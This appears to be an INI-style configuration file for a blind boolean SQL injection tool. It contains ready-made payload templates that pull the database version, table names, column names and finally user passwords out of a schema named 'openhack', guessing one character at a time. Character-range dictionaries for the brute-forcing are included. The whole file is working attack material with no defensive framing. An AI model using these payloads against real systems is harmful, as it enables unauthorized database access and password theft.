[payload]
#applies to functions like version(), database()
funcs = ' or (1=(select if(substr({},{},1)>char({}),1,0)) and 1=(select if(substr({},{},1)<char({}),1,0)))--'--
#brute force tables
#tables = ' or 1=exists(select table_name as a from information_schema.tables where table_schema = 'openhack' having substr(a,{},1)>char({}) and substr(a,{},1)<char({}) limit {},1)--'--
tables = ' or 1=exists(select a from (select table_name as a from information_schema.tables where table_schema = 'openhack' limit {},1) as b  having substr(a,{},1)>char({}) and substr(a,{},1)<char({}))--'--
columns = ' or 1=exists(select a from (select column_name as a from information_schema.columns where table_schema = 'openhack' limit {},1) as b having substr(a,{},1)>char({}) and substr(a,{},1)<char({}))--'--
data =' or 1=exists(select a from (select password as a from users limit {},1) as b  having substr(a,{},1)>char({}) and substr(a,{},1)<char({}))--'--

[funcs]
#functions
version = version()
database = database()

[dictionary]
custom_dict_bool = yes
custom_dict = 45-46,48-57,65-90,95
default_dict = 33-95
